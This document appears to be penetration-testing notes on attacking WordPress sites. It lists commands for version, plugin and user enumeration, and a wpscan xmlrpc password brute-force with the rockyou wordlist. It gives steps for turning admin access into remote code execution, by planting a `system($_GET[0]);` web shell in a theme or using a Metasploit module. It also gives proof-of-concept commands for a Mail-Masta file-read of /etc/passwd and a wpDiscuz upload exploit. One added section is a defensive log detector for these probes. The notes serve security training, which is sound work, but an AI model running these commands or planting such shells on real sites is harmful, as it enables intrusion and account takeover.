# WordPress

<table><thead><tr><th width="178">User Role</th><th>Description</th></tr></thead><tbody><tr><td>Administrator</td><td>Full privileges - this user role is an interesting target due to its capability of managing plugins</td></tr><tr><td>Editor</td><td>Can publish and manage any user's posts - this user role is an interesting target due to its capability of managing plugins</td></tr><tr><td>Author</td><td>Can publish and manage their own posts</td></tr><tr><td>Contributor</td><td>Can write and manage their own posts, but cannot publish them</td></tr><tr><td>Subscriber</td><td>Can view posts and manage/modify their own profile</td></tr></tbody></table>

Getting access to an administrator is usually sufficient to obtain code execution on the server.\
Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

***

## **WordPress Discovery/Footprinting**

**Manual Identification:**

* Check if the `robots.txt` file contains any WordPress entry
* Check if `/wp-admin`, `/wp-content`, `xmlrpc.php` or other WordPress-related artifacts exist.
* Search the WP version inside the page source code:\
  `curl example.com | grep '<meta name="generator"'`
* Search the WP version inside the `css` or `js` files:\
  `curl example.com | grep '?ver='`
* Find the version inside `readme.html` (only works for old ones)

Identification using WPScan:

* `wpscan --url example.com --enumerate --api-token TOKENVALUE`

Plugins Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2`
* You can also check whether a plugin is installed by requesting the plugin's directory without the trailing `/` and observing whether the web application redirects to the complete folder (via a 3XX redirect):\
  `curl -I -X GET http://example.com/wp-content/plugins/mail-masta` <- note the missing trailing `/`
* If the application answers with a 3XX redirect, the plugin directory exists. If it answers with a 404, it does not.

{% hint style="info" %}
This technique finds installed plugins, including ones that are currently deactivated.
{% endhint %}

Themes Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2`

***

## **User Enumeration**

Some versions of the WordPress login page allow username enumeration because their verbose error messages state whether a username exists or not.

Alternative methods are:

1. Use the `?author=` GET parameter to check whether the page redirects you to a valid user's page:\
   `curl -s -I http://example.com/?author=1`
2. Check usernames via the `wp-json` `users` REST endpoint:\
   `curl http://example.com/wp-json/wp/v2/users | jq`

Once you have found a valid username, you can use `wpscan` to brute-force that user's password (usernames are passed to `-U` as a comma-separated list without spaces):\
`sudo wpscan --password-attack xmlrpc -t 20 -U admin,sfoffo -P /usr/share/wordlists/rockyou.txt --url https://example.com`

{% hint style="danger" %}
Some WordPress instances may lock out a user after a few invalid attempts.
{% endhint %}
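From the defender's side, the plugin probe above (3XX/404 answers on bare plugin directories), the `?author=` sweep, the `wp-json` users listing and the `xmlrpc.php` password attack all leave a recognisable trace in the web server access log. The following detector is an added example, not part of the original notes: it parses combined-format log lines and flags each client that matches those patterns. The IP addresses, thresholds and sample lines are constructed for the demonstration.

```python
import re
from collections import defaultdict

# Fields we need from a combined-format access log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Bare plugin directory request (no file inside it): the trailing-slash redirect/404 probe.
PLUGIN_PROBE = re.compile(r'^/wp-content/plugins/[^/?]+/?$')
# The ?author=N sweep that relies on the canonical redirect to /author/<login>/.
AUTHOR_PROBE = re.compile(r'^/\?author=\d+$')

def detect(lines, plugin_min=3, author_min=2, xmlrpc_min=5):  # -> {client_ip: [finding, ...]}
    per_ip = defaultdict(lambda: {"plugins": set(), "authors": set(), "users_api": 0, "xmlrpc": 0})
    for m in filter(None, map(LOG_RE.match, lines)):
        ip, method, path, status = m.group("ip", "method", "path", "status")
        s = per_ip[ip]
        if PLUGIN_PROBE.match(path) and status in ("301", "302", "404"):
            s["plugins"].add(path.rstrip("/"))      # distinct plugin slugs probed
        elif AUTHOR_PROBE.match(path):
            s["authors"].add(path)                  # distinct author IDs tried
        elif path.startswith("/wp-json/wp/v2/users"):
            s["users_api"] += 1
        elif method == "POST" and path == "/xmlrpc.php":
            s["xmlrpc"] += 1                        # wpscan --password-attack xmlrpc
    findings = {}
    for ip, s in per_ip.items():
        hits = [label for cond, label in (
            (len(s["plugins"]) >= plugin_min, "plugin-enumeration"),
            (len(s["authors"]) >= author_min, "author-enumeration"),
            (s["users_api"] > 0, "wp-json-users-listing"),
            (s["xmlrpc"] >= xmlrpc_min, "xmlrpc-password-attack")) if cond]
        if hits:
            findings[ip] = hits
    return findings

# Constructed sample log (made-up IPs, timestamps and user agents) for demonstration only.
def _line(ip, method, path, status, ua):
    return f'{ip} - - [10/Aug/2021:12:00:00 +0000] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'

SCANNER, VISITOR = "203.0.113.7", "198.51.100.5"
SAMPLE_LOG = (
    [_line(SCANNER, "GET", f"/wp-content/plugins/{p}", st, "curl/7.68.0")
     for p, st in (("mail-masta", 301), ("wpdiscuz", 301), ("akismet", 404))]
    + [_line(SCANNER, "GET", f"/?author={i}", 301, "curl/7.68.0") for i in (1, 2)]
    + [_line(SCANNER, "GET", "/wp-json/wp/v2/users", 200, "curl/7.68.0")]
    + [_line(SCANNER, "POST", "/xmlrpc.php", 200, "WPScan v3.8") for _ in range(6)]
    # A normal visitor loading a plugin's stylesheet and a post must not trigger anything.
    + [_line(VISITOR, "GET", "/wp-content/plugins/akismet/_inc/akismet.css?ver=4.1", 200, "Mozilla/5.0"),
       _line(VISITOR, "GET", "/?p=1", 200, "Mozilla/5.0")]
)
```

Running `detect(SAMPLE_LOG)` reports all four findings for the scanner address and nothing for the ordinary visitor; feed it real log lines (or tune the thresholds) to use it against an actual server.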

***

## **Admin User - Remote Code Execution**

> An administrator account may edit PHP code in order to gain RCE.\
> Note: when editing an active theme or plugin you may encounter errors. Deactivate them first.

**The steps are the following:**

* **Semi-automatically, using `msfconsole`**:\
  `use exploit/unix/webapp/wp_admin_shell_upload`
* **Manually, by modifying a theme:**
  1. Log in as administrator.\
     Navigate to: Appearance → side panel → Theme Editor → select a theme
  2. Add the following to the theme: `system($_GET[0]);`
  3. Use the following URL to gain RCE: `http://example.test/wp-content/themes/THEMENAME/FILEPHPNAME.PHP?0=id`

***

## **WordPress Known Vulnerable Plugins**

1. `Mail-Masta` allows LFI by using the following PoC: `curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd`
2. `wpDiscuz` allows RCE by using the following PoC:
   * [ExploitDB](https://www.exploit-db.com/exploits/49967): `python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1`
   * If it fails, use `cURL` to execute commands through the uploaded web shell: `curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id`
